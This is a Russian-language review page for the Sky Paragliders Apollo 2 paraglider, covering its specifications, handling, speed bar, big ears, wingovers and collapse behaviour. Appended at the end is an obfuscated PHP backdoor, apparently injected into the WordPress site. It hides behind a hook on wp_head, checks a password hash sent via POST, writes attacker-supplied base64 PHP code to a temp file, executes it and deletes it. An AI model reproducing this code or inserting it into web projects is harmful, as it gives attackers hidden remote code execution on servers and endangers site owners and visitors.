Sky Paragliders Apollo 2 – баланс во всем!

Sky Paragliders – эта фирма уже на парапланерном рынке более 30 лет с колоссальным опытом в разработках и производстве крыльев, спассистем и подвесок. С каждым годом в крылья внедряют все новые и новые технологии, обкатка которых идет на прототипах и внедрение их в СССкласс. “Спуск” обкатанных технологий на классы ниже предсказуем и встретить в крыльях В-класса “Акулий профиль” или 3D крой передней кромки уже не редкость, и все равно производители добавляют свои “фишки”…

И так начнем, Apollo 2 – это современный параплан с завидным набором характеристик. При этом обладает достаточно высокой пассивной безопасностью при том,что  крыло относится больше к верху В-класса.

Параплан пришел в Крым в июне, в размере L 85-108 – 26.8 м. Тест производился в загрузке 105 кг.

Краткие технические характеристики.

Вес параплана Apollo 2  в среднем размере М составляет – 4,25 кг.
Удлинение крыла – 5,59, небольшое, среднее в современном классе.

Можно сказать, что вектор основной был сделан на парючесть и безопасность.
Количество секций – 55, вполне обычное.
Ткань:
Ткань верхняя – Skytex 38 g акцент сделан на более долговечный ресурс.
Ткань нижняя – Skytex 32 g.
Внутренние ребра жесткости и диагонали – skytex 40 g, более мощные нервюры – это хорошо!
Стропы:
Верхний ярус – Edelrid/Liros
Средний ярус – Edelrid
Нижний ярус – Liros

Свободные концы имеют классическую трехрядную схему и сделаны из polyester 13 mm, тонкие и изящные, очень приятно держать в руках.

В передней кромке стоят лески. Они не длинные, но их хватает для создания достаточной жесткости передней части крыла. В дополнение в фронтальной части вшити усиления из плотной ткани, тем самым лески стали еще более жесткими и стойкими к истиранию.

Sky Paragliders apollo 2

Особенно порадовала в этом крыле небольшая жесткая планка в верхней части клеванты, в итоге очень удобно работать клевантами в потоке. Обычно такие бобышки ставятся на акрокрыльях для более четкого управления. На Apollo 2 они пришлись как нельзя кстати, в потоке очень удобно работать!

Sky Paragliders apollo 2

3D крой переднем кромки – для лучшего обтекания!
Sky Paragliders apollo 2

Теперь о Apollo 2 в полете

Тест крыла проводился в термодинамике. Сила ветра в среднем 5-7 мс.
Старт крыла спокойный, нет склонности к выстреливанию, в более сильный ветер иногда нужно приостановить крыло что бы не обгонял, но точно нет выдергивания как например у Ментора.

В полете параплан очень понятен. Чувствуется монолитность, даже в среднюю турбулентность. Свободный ход на клевантах небольшой, с завода около 7 см, укорачивать точно не надо. Нагрузка на клеванты умеренная, возрастающая по мере затягивания. В поворотах незамечено особого просыпания, а если работать весом, то оно ив сходит на нет. Стоит отметить, что крыло хорошо выпаривает в слабых условиях.

Работа акселератора

Крыло заметно добавляет в скорости, но замеры с помощью GPS не проводилось. На акселераторе параплан хорошо рулится С-рядом, для этого на ряду имеются удобные ручки для управления крылом на акселераторе.

Sky Paragliders apollo 2

Режим “Уши”

Складываются легко, из рук не вырываются, подлипают, в результате чего держать их удобно. Снижение увеличивается на 1.5-2 м/с. Весом на “ушах” крыло рулится хорошо. При отпускании раскрываются самостоятельно, нет подлипаний как на некоторых крыльях.

Sky Paragliders apollo 2

Винговеры

Крыло практически со второго кача уходит в уровень с пилотом, винговеры получаются глубокими, амплитуду держать не составляет сложности.

Sky Paragliders apollo 2
Были проведены тесты на ассиметричное, фронтальное сложение.

Ассиметричное сложение

Если не компенсировать, параплан делает доворот на 15-30 грд в сторону сложения, сильного клевка не происходит, сложенная консоль раскрывается самостоятельно.
При компенсации весом параплан не меняет своей траектории, если удерживать сложенную консоль.

Sky Paragliders apollo 2


Фронтальное сложение

Происходит сложение передней трети хорды, клевок крыла очень слабый 20 град. Останавливать параплан ни разу не приходилось крыло очень стабильно ведет себя, доворотов ни в какую сторону небыло.

Sky Paragliders apollo 2

Заход на посадку как на гору, так и внизу простой и интуитивный. Заход на ограниченную площадку при наличии опыта не вызывает особых сложностей.

Общее впечатление:

Очень большое внимание в Apollo 2 уделено пассивной безопасности и управлению. Стоит сказать что на этом крыле просто комфортно и приятно летать, все понятно и предсказуемо. В горах крыло будет легко подсказывать пилоту, где ядро потока, и помогать уходить на маршрут.  Параплан отлично подойдет тем,к хочет оставаться в В-классе без ущерба безопасности!

 

Об инструкторе

Обратный звонок

Ваше имя (обязательно)

Ваш телефон (обязательно)

Подарочный сертификат

Ваше имя (обязательно)

Ваш телефон (обязательно)

Выбрать валюту магазина
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}